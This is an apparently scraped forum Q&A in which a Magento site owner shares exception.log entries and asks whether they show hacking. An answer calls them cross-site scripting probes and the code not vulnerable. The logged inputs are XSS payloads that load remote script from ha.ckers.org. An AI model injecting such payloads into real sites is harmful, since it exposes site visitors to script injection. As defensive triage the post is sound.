xss - magento - hackers or exploit -
xss - magento - hackers or exploit -
i found these entries in magento log file. not sure if hackers attempting come in enter bad data, or evidence of exploit. log file:
var/log/exception.log:4118:2014-10-30t22:46:39+00:00 debug (7): exception message: no date part in '<?import namespace="crosssitescripting" implementation="http://ha.ckers.org/crosssitescripting.htc">' found. var/log/exception.log:4131:exception 'zend_locale_exception' message 'no date part in '<?import namespace="crosssitescripting" implementation="http://ha.ckers.org/crosssitescripting.htc">' found.' in lib/zend/locale/format.php:869 var/log/exception.log:4352:2014-10-30t22:46:49+00:00 debug (7): exception message: no date part in '<script src=http://ha.ckers.org/xss.js></script>' found. var/log/exception.log:4365:exception 'zend_locale_exception' message 'no date part in '<script src=http://ha.ckers.org/xss.js></script>' found.' in lib/zend/locale/format.php:869 var/log/exception.log:4534:2014-10-30t22:46:55+00:00 debug (7): exception message: no date part in '<script/xss src="http://ha.ckers.org/xss.js"></script>' found. var/log/exception.log:4547:exception 'zend_locale_exception' message 'no date part in '<script/xss src="http://ha.ckers.org/xss.js"></script>' found.' in lib/zend/locale/format.php:869
they appear coming function in lib/zend/locale/format.php - line 869
private static function _parsedate($date, $options)
relevant code is:
// split number parts $split = false; preg_match_all('/\d+/u', $number, $splitted); if (count($splitted[0]) == 0) { iconv_set_encoding('internal_encoding', $oenc); #require_once 'zend/locale/exception.php'; throw new zend_locale_exception("no date part in '$date' found."); } if (count($splitted[0]) == 1) { $split = 0; } $cnt = 0; foreach($parse $key => $value) {
the log file entries shows evidence of attempting identify cross site scripting vulnerability. based on code snippet provided not vulnerable.
magento xss exploit
Comments
Post a Comment